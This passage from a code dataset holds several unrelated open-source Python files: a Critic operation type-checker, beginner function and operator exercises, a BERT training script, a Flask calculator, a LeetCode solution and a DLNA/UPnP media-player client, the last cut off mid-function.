Applies the\n per-element checker on each element in the array.\n\n \"\"\"\n def __init__(self, source):\n if len(source) != 1:\n raise base.ImplementationError(\"invalid source type\")\n self.__checker = TypeChecker.make(source[0])\n\n def __call__(self, value, context):\n if not type(value) is list:\n raise OperationError(\"%s is not a list\" % context)\n for index, item in enumerate(value):\n self.__checker(item, \"%s[%d]\" % (context, index))\n\nclass VariantChecker:\n \"\"\"\\\n Type checker for variants (values of one of a set of types.)\n\n Raises an OperationError if the checked value is not one of the permitted\n types (checked by applying a per-type checker on the value.)\n\n \"\"\"\n def __init__(self, source):\n self.__checkers = [TypeChecker.make(item) for item in source]\n\n def __call__(self, value, context):\n for checker in self.__checkers:\n try:\n checker(value, context)\n return\n except OperationError:\n pass\n raise OperationError(\"%s is of invalid type\" % context)\n\nclass EnumerationChecker:\n \"\"\"\\\n Type checker for enumerations.\n\n Raises an OperationError if the checked value is not a string or if the\n string value is not a member of the enumeration.\n\n \"\"\"\n def __init__(self, source):\n self.__checker = TypeChecker.make(str)\n for item in source:\n if not type(item) is str:\n raise base.ImplementationError(\"invalid source type\")\n self.__enumeration = source\n\n def __call__(self, value, context):\n self.__checker(value, context)\n if value not in self.__enumeration:\n raise OperationError(\"invalid input: %s is not valid\" % context)\n\nclass StringChecker:\n \"\"\"\\\n Type checker for strings.\n\n Raises an OperationError if the checked value is not a string.\n\n \"\"\"\n def __call__(self, value, context):\n if not (type(value) is str or type(value) is unicode):\n raise OperationError(\"invalid input: %s is not a string\" % context)\n\nclass IntegerChecker:\n \"\"\"\\\n Type checker for integers.\n\n Raises an OperationError if the checked value is not an integer.\n\n \"\"\"\n def __call__(self, value, context):\n if not type(value) is int:\n raise OperationError(\"invalid input: %s is not an integer\" % context)\n\nclass BooleanChecker:\n \"\"\"\\\n Type checker for booleans.\n\n Raises an OperationError if the checked value is not a boolean.\n\n \"\"\"\n def __call__(self, value, context):\n if not type(value) is bool:\n raise OperationError(\"invalid input: %s is not a boolean\" % context)\n\nclass Operation(object):\n \"\"\"\\\n Base class for operation implementations.\n\n Sub-classes must call Operation.__init__() to define the structure of\n expected input data.\n\n An operation accepts input in the form of a JSON object literal and returns\n a result in the form of a JSON object literal. The object contains a\n property named \"status\" whose value should be \"ok\" or \"error\". If it is\n \"error\", the object contains a property named \"error\" whose value is an\n error message. If the HTTP request method is POST, the input is the request\n body (this is the usual case) otherwise, if the HTTP request method is GET,\n the input is the value of the \"data\" URI query parameter (this is supported\n to simplify ad-hoc testing).\n\n Operation implementations should inherit this class and implement the\n process() method. This method is called with two positional arguments, 'db'\n and 'user', and one keyword argument per property in the input value. 
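A minimal
    hypothetical subclass could look like

        class SetFullname(Operation):
            def __init__(self):
                Operation.__init__(self, { \"fullname\": str })
            def process(self, db, user, fullname):
                return OperationResult(fullname=fullname)

    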
The\n process() method should return an OperationResult object or either return or\n raise an OperationError object. Any other raised exceptions are caught and\n converted to OperationError objects.\n\n \"\"\"\n def __init__(self, parameter_types, accept_anonymous_user=False):\n \"\"\"\\\n Initialize input data type checker.\n\n The parameter_types argument must be a dict object. See TypeChecker and\n sub-classes for details on how it works. A parameter types argument of\n\n { \"name\": str,\n \"points\": [{\"x\": int, \"y\": int }],\n \"what\": Optional(str) }\n\n would for instance represents an input object with two required\n properties named \"name\" and \"points\", and an optional property named\n \"what\". The \"name\" and \"what\" property values should be a strings. The\n \"points\" property value should be an array of objects, each with two\n properties named \"x\" and \"y\", whose values should be integer.\n\n The operation's process() method would be called with the keyword\n arguments \"name\", \"points\" and \"what\".\n\n \"\"\"\n if not type(parameter_types) is dict:\n raise base.ImplementationError(\"invalid source type\")\n self.__checker = TypeChecker.make(parameter_types)\n self.__accept_anonymous_user = accept_anonymous_user\n\n def __call__(self, req, db, user):\n if user.isAnonymous() and not self.__accept_anonymous_user:\n return OperationFailureMustLogin()\n\n if req.method == \"POST\": data = req.read()\n else: data = req.getParameter(\"data\")\n\n if not data: raise OperationError(\"no input\")\n\n try: value = json_decode(data)\n except ValueError as error: raise OperationError(\"invalid input: %s\" % str(error))\n\n try:\n self.__checker(value)\n return self.process(db, user, **value)\n except OperationError as error:\n return error\n except OperationFailure as failure:\n return failure\n except dbutils.NoSuchUser as error:\n return OperationFailure(code=\"nosuchuser\",\n title=\"Who is '%s'?\" % error.name,\n message=\"There is no user in Critic's database named that.\")\n except dbutils.NoSuchReview as error:\n return OperationFailure(code=\"nosuchreview\",\n title=\"Invalid review ID\",\n message=\"The review ID r/%d is not valid.\" % error.id)\n except dbutils.TransactionRollbackError:\n return OperationFailure(code=\"transactionrollback\",\n title=\"Transaction rolled back\",\n message=\"Your database transaction rolled back, probably due to a deadlock. Please try again.\")\n except:\n error_message = (\"User: %s\\nReferrer: %s\\nData: %s\\n\\n%s\"\n % (user.name,\n req.getReferrer(),\n json_encode(self.sanitize(value), indent=2),\n traceback.format_exc()))\n\n db.rollback()\n\n if not user.hasRole(db, \"developer\"):\n mailutils.sendExceptionMessage(db, \"wsgi[%s]\" % req.path, error_message)\n\n if configuration.debug.IS_DEVELOPMENT or user.hasRole(db, \"developer\"):\n return OperationError(error_message)\n else:\n return OperationError(\"An unexpected error occurred. 
\" +\n \"A message has been sent to the system administrator(s) \" +\n \"with details about the problem.\")\n\n def process(self, db, user, **kwargs):\n raise OperationError(\"not implemented!?!\")\n\n def sanitize(self, value):\n \"\"\"Sanitize arguments value for use in error messages or logs.\"\"\"\n return value\n\n @staticmethod\n def requireRole(db, role, user):\n if not user.hasRole(db, role):\n raise OperationFailure(\n code=\"notallowed\",\n title=\"Not allowed!\",\n message=\"Operation not permitted.\")\n","sub_path":"src/operation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"513376531","text":"a= abs\nprint(a(-10))\nn1 = 255\nn2 = 100\nprint(\"{}+ {}\".format(hex(n1),hex(n2)))\n\n# 可变参数\ndef calc(*numbers):\n sum = 0\n for n in numbers:\n sum += n*n\n return sum\n\nnums = [1,2,3]\nprint(calc(*nums))\n\n# 关键字参数,可无限个输入参数\ndef calc1(**kw):\n return (kw)\ntemp = {\"hello\":\"kaspar\",\"bye\":2018}\nprint(calc1(**temp))\n\n# 命名关键字参数, 只接受 city和job作为关键字参数\ndef person(name, age, *, city, job):\n print(name ,age, city, job)\n\n# 递归函数\ndef fact(n):\n if n == 1:\n return 1\n return n * fact(n-1)\n\nprint(fact(5))","sub_path":"2function.py","file_name":"2function.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266420371","text":"import pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib\nimport faulthandler\nfaulthandler.enable()\nimport pickle\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport json\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel, EncoderDecoderModel, BertTokenizer\nfrom pathlib import Path\nimport torch.nn as nn\nimport bot_models as models\nimport bot_utils as butils\nfrom bot_utils import Comment_data_preprocessor, Comment_dataset, Comment_pair_dataset\n\n\ntest = False\nnew_dataset = True\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nget_type = 'sample1_first'\n\nprint(\"Loading data\")\nif new_dataset:\n raw_data_path = '../data/pairs_v3.pkl'\n sample1_field = 'fb_post'\n sample2_field = 'tweet'\n json_ = False\n if json_:\n with open(raw_data_path, 'rb') as file:\n raw_data = json.load(file)\n else:\n with open(raw_data_path, 'rb') as file:\n raw_data = pickle.load(file)\n\n if test:\n raw_data = raw_data[0:5]\n\n dataset = Comment_pair_dataset(raw_data, sample1_field, sample2_field, tokenizer)\n dataset.set_get_type(get_type)\n dataset.max_len = 512 #tokenizer.max_len\n\nelse:\n data_path = '' #needs to be readable by pandas\n data_sample_column = 'token_ids'\n tokenized_df = pd.read_csv(data_path)\n dataset = Comment_pair_dataset(tokenized_df, sample1_field, sample2_field, tokenizer, already_tokenized = True)\n dataset.max_len = tokenizer.max_len\n\nresults_dir = '../results'\nmodel_storage_dir = '../saved_models'\n\n\nparameter_dict = {}\nparameter_dict['epochs'] =10\nparameter_dict['num_worker'] = 2\nparameter_dict['batch_size'] = 2\nparameter_dict['learning_rate'] =1e-8\nparameter_dict['weight_decay'] = 0\nparameter_dict['eps'] =1e-8\nparameter_dict['warmup_steps'] =0\nparameter_dict['filename'] = 'pair_v3_encode_decode_100620'\n\nresults_path = Path(Path(results_dir)/Path(parameter_dict['filename']))\nmodel_path = Path(Path(model_storage_dir)/Path(parameter_dict['filename']))\nresults_path.mkdir(parents = True, exist_ok = True)\nmodel_path.mkdir(parents = True, exist_ok 
= True)\n\nprint(\"Loading Model\")\n\nmodel = EncoderDecoderModel.from_encoder_decoder_pretrained('bert-base-uncased', 'bert-base-uncased')\n\nprint(\"Starting Training\")\ntrained_model, optimizer, scheduler, loss_data = butils.train_hugging_encode_decode_keyword(dataset, parameter_dict['epochs'],\n parameter_dict['num_worker'],\n parameter_dict['batch_size'],\n parameter_dict['learning_rate'],\n parameter_dict['weight_decay'],\n parameter_dict['eps'],\n parameter_dict['warmup_steps'],\n model,\n dataset.collate\n )\nprint(\"Saving results\")\n\ndataset.active_data.to_csv(results_path/'training_data.csv')\n\ntrained_model.save_pretrained(model_storage_dir + '/' + parameter_dict['filename'])\ntokenizer.save_pretrained(model_storage_dir+'/'+parameter_dict['filename'])\ntrained_model.config.save_pretrained(model_storage_dir+'/'+parameter_dict['filename'])\n\n#saving torch stuff - see torch docs for proper loading\ntorch.save(optimizer.state_dict(), Path(model_path)/Path(parameter_dict['filename']+' optimizer'))\ntorch.save(scheduler.state_dict(), Path(model_path)/Path(parameter_dict['filename']+' scheduler'))\n\n#saving parameter dict\nwith open(results_path/'parameters.json', 'w') as jsonFile:\n json.dump(parameter_dict, jsonFile)\n\nnp.savetxt(results_path/'loss_data', loss_data, delimiter = ',')\n\n#plotting\nplt.clf()\nplt.scatter(range(parameter_dict['epochs']), loss_data)\nplt.savefig(results_dir + '/' + parameter_dict['filename'] +'/'+'loss_plot.png')\n","sub_path":"cleverrx_bot/scripts/pair_training_launcher.py","file_name":"pair_training_launcher.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"407118366","text":"from flask import Flask, request\nfrom fractions import Fraction\n\napp = Flask(__name__)\n\n\ndef take_inputs():\n if request.method == 'POST':\n value1 = request.values.get('A', default=0, type=str)\n else:\n value1 = request.args.get('A', default=0, type=str)\n try:\n value1 = Fraction(value1)\n except ZeroDivisionError:\n return \"A's denominator shouldn't be zero! \\n\"\n except ValueError:\n return \"A's value should be a number (includes fraction, float, integer). \\n\"\n if request.method == 'GET':\n value2 = request.args.get('B', default=0, type=str)\n else:\n value2 = request.values.get('B', default=0, type=str)\n try:\n value2 = Fraction(value2)\n except ZeroDivisionError:\n return \"B's denominator shouldn't be zero! \\n\"\n except ValueError:\n return \"B's value should be a number (includes fraction, float, integer). 
\\n\"\n return value1, value2 \n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n return 'Usage;\\n<Operation>?A=<Value1>&B=<Value2>\\n'\n\n@app.route('/add', methods=['POST','GET'])\ndef addition():\n try:\n value1, value2 = take_inputs()\n result = value1 + value2\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\n@app.route('/sub', methods=['POST', 'GET'])\ndef subtraction():\n try:\n value1, value2 = take_inputs()\n result = value1 - value2\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\n@app.route('/mul', methods=['POST', 'GET'])\ndef multiplication():\n try:\n value1, value2 = take_inputs()\n result = value1 * value2\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\n@app.route('/div', methods=['POST', 'GET'])\ndef division():\n try:\n value1, value2 = take_inputs()\n try:\n result = ((value1)/(value2))\n except ZeroDivisionError:\n warning_msg = \"B's value shouldn't be zero! \\n\"\n return warning_msg\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\nif __name__ == \"__main __\":\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274748726","text":"import os\r\nimport random\r\n\r\ndef choose_word_list():\r\n file_names = os.listdir(\"data\")\r\n category_position = 0\r\n for f in enumerate(file_names):\r\n file = \"data/\" + file_names[category_position]\r\n with open(file, 'r') as f:\r\n lines = f.read().splitlines()\r\n first_category = lines[0]\r\n print(str(int(category_position) +1) + \") \" + str(first_category))\r\n category_position += 1\r\n \r\n \r\n \r\n\r\n choice = input(\"which one? \")\r\n choice = int(choice)-1\r\n\r\n file = \"data/\" + file_names[choice]\r\n\r\n with open(file, 'r') as f:\r\n lines = f.read().splitlines()\r\n\r\n #print(lines)\r\n\r\n category = lines[0]\r\n puzzle = random.choice(lines[1:])\r\n\r\n print(category)\r\n print(puzzle)\r\nchoose_word_list()\r\n","sub_path":"hangman/more_file_io.py","file_name":"more_file_io.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"606219033","text":"import numpy as np\r\n\r\ndef preprocessing_function(x):\r\n return x / 255.\r\n\r\ninput_config = {\r\n 'target_size': (224, 224),\r\n 'color_mode': 'RGB',\r\n 'im_framework': 'opencv',\r\n 'reference_image': 247. 
* np.ones((1, 224, 224, 3))\r\n}\r\n\r\ncustom_objects = None\r\n\r\nclass_map = {0: 'Normal', 1: 'Pneumonia'}","sub_path":"Imaging/backup/pneumonia_config.py","file_name":"pneumonia_config.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"647588787","text":"from datetime import datetime\nimport os\nimport resource\nimport sys\n\n# CONSTANTS\n__VERSION__ = \"0.0.1\"\n__NAME__ = \"Spardaqus\"\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nEXITONERROR = True\nRSS_MEMORY_BASE = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\nRSS_MEMORY_DIVISOR = 1024.0 if sys.platform == \"darwin\" else 1.0 if sys.platform == \"linux\" else 1.0\nPYSPARK_REQUIRED_PACKAGES = \"org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.4 \" \\\n \"pyspark-shell \"\nSPARK_REQUIRED_EXTRACLASS = \"kafka-clients-0.10.0.1.jar\"\n\n# Dynamically changed by the system; don't mess with these\nLOGGER = None\nMAX_RSS_MEMORY_USED = 0.0\nLAST_RSS_MEMORY_USED = 0.0\nSETTINGS_CACHE = {}\nCACHED_SETTINGS = {}\nKILLSIG = False\n\n# Adjustable if you know what you are doing\nMAX_SPLUNK_BATCH_SIZE = 100000000\nSPLUNK_BATCH_SIZE = 1\n","sub_path":"spardaqus/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"188752942","text":"# Function Without Argument\r\n\r\ndef Function1():\r\n print('My Name Is Bhavy Jilka')\r\n\r\n\r\nFunction1()\r\nFunction1()\r\n\r\n\r\n# Function With Argument\r\n\r\ndef Function2(name):\r\n print('Name is :', name)\r\n\r\n\r\nFunction2('Bhavy Jilka')\r\n\r\n\r\n# Example With Return Statement\r\n\r\ndef Function3(a):\r\n return a\r\n\r\n\r\na = Function3('Bhavy Jilka')\r\nprint(a)\r\n\r\n\r\n# Example With Multiple Return Statement\r\n\r\ndef Function4():\r\n name1 = 'Bhavy Jilka'\r\n contact = 9724462078\r\n return name1, contact\r\n\r\n\r\nname1, contact = Function4()\r\nprint('Name :', name1)\r\nprint('Contact :', contact)\r\n\r\n\r\n# Default Arguments Example\r\n\r\ndef ex(b=10, c=20):\r\n print(b + c)\r\n\r\n\r\nex(30, 50)\r\nex()\r\n\r\n\r\n# Keyword Arguments\r\n\r\ndef ex1(x, y):\r\n print('Sum Is :', x + y)\r\n\r\nex1(y=50, x=30)\r\n\r\n\r\n# Variable Length Arguments\r\n\r\ndef add(*number):\r\n sum = 0\r\n\r\n for n in number:\r\n sum = sum + n\r\n print(\"Sum :\", sum)\r\n\r\nadd(10, 30)\r\nadd(10, 30, 50)\r\n\r\n#Example With Keyword Arguments\r\n\r\ndef func(**arg):\r\n for i,j in arg.items():\r\n print(i,j)\r\n\r\nfunc(Name ='Bhavy',Lastname = 'Jilka')\r\n\r\n#Scope Of Variables\r\n\r\ndef Function5():\r\n v=10\r\n print('Value Inside Function :',v)\r\n\r\nz=15\r\nFunction5()\r\nprint('Value Outside Function :',z)\r\n\r\n#Modules In Python\r\n\r\nimport mymodule\r\n\r\nname =mymodule. 
bj[\"name\"]\r\nprint(name)\r\n\r\n#Arithmetic Operator\r\n\r\nm=10\r\nn=7\r\n\r\nprint('M+N : ',m+n)\r\nprint('M-N : ',m-n)\r\nprint('M*N : ',m*n)\r\nprint('M/N : ',m/n)\r\nprint('M//N : ',m//n)\r\nprint('M**N : ',m**n)\r\n\r\n#Comparison Operators\r\n\r\nd = 20\r\ne = 12\r\n\r\nprint('d > e is ', d > e )\r\nprint('d < e is ', d < e )\r\nprint('d == e is ', d == e )\r\nprint('d != e is ', d != e )\r\nprint('d >= e is ', d >= e )\r\nprint('d <= e is ', d <= e )\r\n\r\n#Logical Operators\r\n\r\n#Example of And\r\na1=10\r\na2=20\r\na3=30\r\n\r\nif a1>a2 and a1>a3:\r\n print('A1 is the largest number.')\r\nif a2>a1 and a2>a3:\r\n print('A2 is largest number.')\r\nif a3>a1 and a3>a2:\r\n print('A3 is largest number.')\r\n\r\n#Example Of Or\r\n\r\nch = input(\"Enter a character : \")\r\n\r\nif(ch=='A' or ch=='a' or ch=='e' or ch=='E' or ch=='i' or ch=='I' or ch=='o' or ch=='O' or ch=='u' or ch=='U'):\r\n print(ch,'Is a Vowel')\r\nelse:\r\n print(ch,'Is a consonant')\r\n\r\n#membership operators\r\n\r\nb1=10\r\nb2=7\r\nlist2=[10,20,30,40,50]\r\n\r\nprint(b1 in list2)\r\nprint(b2 in list2)\r\nprint(b2 not in list2)\r\n\r\n#Identity Operators\r\nc1=20\r\nc2=20\r\n\r\nprint(c1 is c2)\r\nprint(c1 is not c2)","sub_path":"taskk4.py","file_name":"taskk4.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"472046622","text":"# title: sum-of-distances-in-tree\n# detail: https://leetcode.com/submissions/detail/408925711/\n# datetime: Thu Oct 15 13:03:59 2020\n# runtime: 400 ms\n# memory: 25.8 MB\n\nclass Solution:\n def sumOfDistancesInTree(self, N: int, edges: List[List[int]]) -> List[int]:\n g = collections.defaultdict(list)\n for i, j in edges:\n g[i].append(j)\n g[j].append(i)\n \n def dfs(i, parent):\n children = g[i]\n cnt, dist = 1, 0\n for j, child in enumerate(children):\n if child == parent:\n children[j] = None\n continue\n cnt1, dist1 = dfs(child, i)\n children[j] = [child, cnt1, dist1 + cnt1]\n cnt += cnt1\n dist += dist1 + cnt1\n children.append([-1, cnt, dist])\n return cnt, dist\n \n def dfs2(i, p_cnt, p_dist):\n children = g[i]\n i_cnt, i_dist = children[-1][1], children[-1][2]\n result[i] = i_dist + p_dist + p_cnt\n for j, child in enumerate(children):\n if child is None or child[0] == -1:\n continue\n c_cnt = p_cnt + i_cnt - child[1]\n c_dist = p_dist + p_cnt + i_dist - child[2]\n dfs2(child[0], c_cnt, c_dist)\n \n root = 0 \n # root = random.randint(0, N - 1)\n dfs(root, -1)\n result = [0] * N\n dfs2(root, 0, 0)\n return result","sub_path":"leetcode/sum-of-distances-in-tree/408925711.py","file_name":"408925711.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"650788853","text":"#!/usr/bin/python\n\n# @file dlnap.py\n# @author cherezov.pavel@gmail.com\n# @brief Python over the network media player to playback on DLNA UPnP devices.\n\n# Change log:\n# 0.1 initial version.\n# 0.2 device renamed to DlnapDevice; DLNAPlayer is disappeared.\n# 0.3 debug output is added. 
Extract location url fixed.\n# 0.4 compatible discover mode added.\n# 0.5 xml parser introduced for device descriptions\n# 0.6 xpath introduced to navigate over xml dictionary\n# 0.7 device ip argument introduced\n# 0.8 debug output is replaced with standard logging\n\n__version__ = \"0.8\"\n\nimport re\nimport sys\nimport time\nimport socket\nimport select\nimport logging\nimport traceback\nfrom contextlib import contextmanager\n\nimport os\n\npy3 = sys.version_info[0] == 3\nif py3:\n from urllib.request import urlopen\nelse:\n from urllib2 import urlopen\n\nSSDP_GROUP = (\"239.255.255.250\", 1900)\nURN_AVTransport = \"urn:schemas-upnp-org:service:AVTransport:1\"\nSSDP_ALL = \"ssdp:all\"\n\ndef _get_port(location):\n \"\"\" Extract port number from url.\n\n location -- string like http://anyurl:port/whatever/path\n return -- port number\n \"\"\"\n port = re.findall('http://.*?:(\\d+).*', location)\n return int(port[0]) if port else 80\n\ndef _get_tag_value(x, i = 0):\n \"\"\" Get the nearest to 'i' position xml tag name.\n\n x -- xml string\n i -- position to start searching tag from\n return -- (tag, value) pair.\n e.g\n <d>\n <e>value4</e>\n </d>\n result is ('d', '<e>value4</e>')\n \"\"\"\n x = x.strip()\n value = ''\n tag = ''\n\n # skip <? > tag\n if x[i:].startswith('<?'):\n i += 2\n while i < len(x) and x[i] != '<':\n i += 1\n\n # check for empty tag like '</tag>'\n if x[i:].startswith('</'):\n i += 2\n in_attr = False\n while i < len(x) and x[i] != '>':\n if x[i] == ' ':\n in_attr = True\n if not in_attr:\n tag += x[i]\n i += 1\n return (tag, '', x[i+1:])\n\n # not an xml, treat like a value\n if not x[i:].startswith('<'):\n return ('', x[i:], '')\n\n i += 1 # <\n\n # read first open tag\n in_attr = False\n while i < len(x) and x[i] != '>':\n # get rid of attributes\n if x[i] == ' ':\n in_attr = True\n if not in_attr:\n tag += x[i]\n i += 1\n\n i += 1 # >\n\n while i < len(x):\n value += x[i]\n if x[i] == '>' and value.endswith('</' + tag + '>'):\n # Note: will not work with xml like <a> <a></a> </a>\n close_tag_len = len(tag) + 2 # />\n value = value[:-close_tag_len]\n break\n i += 1\n return (tag, value[:-1], x[i+1:])\n\ndef _xml2dict(s):\n \"\"\" Convert xml to dictionary.\n\n <?xml version=\"1.0\"?>\n <a any_tag=\"tag value\">\n <b> <bb>value1</bb> </b>\n <b> <bb>value2</bb> </b>\n </c>\n <d>\n <e>value4</e>\n </d>\n <g>value</g>\n </a>\n\n =>\n\n { 'a':\n {\n 'b': [ {'bb':value1}, {'bb':value2} ],\n 'c': [],\n 'd':\n {\n 'e': [value4]\n },\n 'g': [value]\n }\n }\n \"\"\"\n d = {}\n while s:\n tag, value, s = _get_tag_value(s)\n value = value.strip()\n isXml, dummy, dummy2 = _get_tag_value(value)\n if tag not in d:\n d[tag] = []\n if not isXml:\n if not value:\n continue\n d[tag].append(value.strip())\n else:\n if tag not in d:\n d[tag] = []\n d[tag].append(_xml2dict(value))\n return d\n\ns = \"\"\"\n <?xml version=\"1.0\"?>\n <a any_tag=\"tag value\">\n <b><bb>value1</bb></b>\n <b><bb>value2</bb> <v>value3</v></b>\n </c>\n <d>\n <e>value4</e>\n </d>\n <g>value</g>\n </a>\n\"\"\"\n\ndef _xpath(d, path):\n \"\"\" Return value from xml dictionary at path.\n\n d -- xml dictionary\n path -- string path like root/device/serviceList/service@serviceType=URN_AVTransport/controlURL\n return -- value at path or None if path not found\n \"\"\"\n\n for p in path.split('/'):\n tag_attr = p.split('@')\n tag = tag_attr[0]\n if tag not in d:\n return None\n\n attr = tag_attr[1] if len(tag_attr) > 1 else ''\n if attr:\n a, aval = attr.split('=')\n for s in d[tag]:\n if s[a] == [aval]:\n d = 
s\n break\n else:\n d = d[tag][0]\n return d\n\ndef _get_control_url(xml):\n \"\"\" Extract AVTransport contol url from device description xml\n\n xml -- device description xml\n return -- control url or empty string if wasn't found\n \"\"\"\n return _xpath(xml, 'root/device/serviceList/service@serviceType={}/controlURL'.format(URN_AVTransport))\n\n@contextmanager\ndef _send_udp(to, payload):\n \"\"\" Send UDP message to group\n\n to -- (host, port) group to send to payload to\n payload -- message to send\n \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.sendto(payload.encode(), to)\n yield sock\n sock.close()\n\ndef _send_tcp(to, payload):\n \"\"\" Send TCP message to group\n\n to -- (host, port) group to send to payload to\n payload -- message to send\n \"\"\"\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(to)\n sock.sendall(payload.encode())\n finally:\n sock.close()\n\ndef _get_location_url(raw):\n \"\"\" Extract device description url from discovery response\n\n raw -- raw discovery response\n return -- location url string\n \"\"\"\n for d in raw.split('\\r\\n'):\n if d.lower().startswith('location:'):\n return re.findall('location:\\s*(.*)\\s*', d, re.I)[0]\n return ''\n\ndef _get_friendly_name(xml):\n \"\"\" Extract device name from description xml\n\n xml -- device description xml\n return -- device name\n \"\"\"\n return _xpath(xml, 'root/device/friendlyName')\n\nclass DlnapDevice:\n \"\"\" Represents DLNA/UPnP device.\n \"\"\"\n\n def __init__(self, raw, ip):\n self.__logger = logging.getLogger(self.__class__.__name__)\n self.__logger.info('=> New DlnapDevice (ip = {}) initialization..'.format(ip))\n\n self.__raw = raw.decode()\n self.ip = ip\n self.port = None\n self.control_url = None\n self.name = 'Unknown'\n self.has_av_transport = False\n\n try:\n self.location = _get_location_url(self.__raw)\n self.__logger.info('location: {}'.format(self.location))\n\n self.port = _get_port(self.location)\n self.__logger.info('port: {}'.format(self.port))\n\n raw_desc_xml = urlopen(self.location).read().decode()\n\n self.__desc_xml = _xml2dict(raw_desc_xml)\n self.__logger.debug('description xml: {}'.format(self.__desc_xml))\n\n self.name = _get_friendly_name(self.__desc_xml)\n self.__logger.info('friendlyName: {}'.format(self.name))\n\n self.control_url = _get_control_url(self.__desc_xml)\n self.__logger.info('control_url: {}'.format(self.control_url))\n\n self.has_av_transport = self.control_url is not None\n self.__logger.info('=> Initialization completed'.format(ip))\n except Exception as e:\n self.__logger.warning('DlnapDevice (ip = {}) init exception:\\n{}'.format(ip, traceback.format_exc()))\n\n def __repr__(self):\n return '{} @ {}'.format(self.name, self.ip)\n\n def __eq__(self, d):\n return self.name == d.name and self.ip == d.ip\n\n def _create_packet(self, action, payload):\n \"\"\" Create packet to send to device control url.\n\n action -- control action\n payload -- xml to send to device\n \"\"\"\n header = \"\\r\\n\".join([\n 'POST {} HTTP/1.1'.format(self.control_url),\n 'User-Agent: {}/{}'.format(__file__, __version__),\n 'Accept: */*',\n 'Content-Type: text/xml; charset=\"utf-8\"',\n 'HOST: {}:{}'.format(self.ip, self.port),\n 'Content-Length: {}'.format(len(payload)),\n 'SOAPACTION: \"{}#{}\"'.format(URN_AVTransport, action),\n 'Connection: close',\n '',\n payload,\n ])\n\n return header\n\n def set_current(self, url, instance_id = 0):\n \"\"\" Set media to playback.\n\n url -- media url\n 
instance_id -- device instance id\n \"\"\"\n payload = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body>\n <u:SetAVTransportURI xmlns:u=\"{}\">\n <InstanceID>{}</InstanceID>\n <CurrentURI>{}</CurrentURI>\n <CurrentURIMetaData />\n </u:SetAVTransportURI>\n </s:Body>\n </s:Envelope>\"\"\".format(URN_AVTransport, instance_id, url)\n\n packet = self._create_packet('SetAVTransportURI', payload)\n _send_tcp((self.ip, self.port), packet)\n\n def play(self, instance_id=0):\n \"\"\" Play media that was already set as current.\n\n instance_id -- device instance id\n \"\"\"\n payload = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body>\n <u:Play xmlns:u=\"{}\">\n <InstanceID>{}</InstanceID>\n <Speed>1</Speed>\n </u:Play>\n </s:Body>\n </s:Envelope>\"\"\".format(URN_AVTransport, instance_id)\n\n packet = self._create_packet('Play', payload)\n _send_tcp((self.ip, self.port), packet)\n\n def pause(self):\n pass\n\n def stop(self):\n pass\n\n def set_next(self, url):\n pass\n\n def next(self):\n pass\n\ndef discover(name = '', ip = '', timeout = 1, st = SSDP_ALL, mx = 3):\n \"\"\" Discover UPnP devices in the local network.\n\n name -- name or part of the name to filter devices\n timeout -- timeout to perform discover\n st -- st field of discovery packet\n mx -- mx field of discovery packet\n return -- list of DlnapDevice\n \"\"\"\n payload = \"\\r\\n\".join([\n 'M-SEARCH * HTTP/1.1',\n 'User-Agent: {}/{}'.format(__file__, __version__),\n 'HOST: {}:{}'.format(*SSDP_GROUP),\n 'Accept: */*',\n 'MAN: \"ssdp:discover\"',\n 'ST: {}'.format(st),\n 'MX: {}'.format(mx),\n '',\n ''])\n devices = []\n with _send_udp(SSDP_GROUP, payload) as sock:\n start = 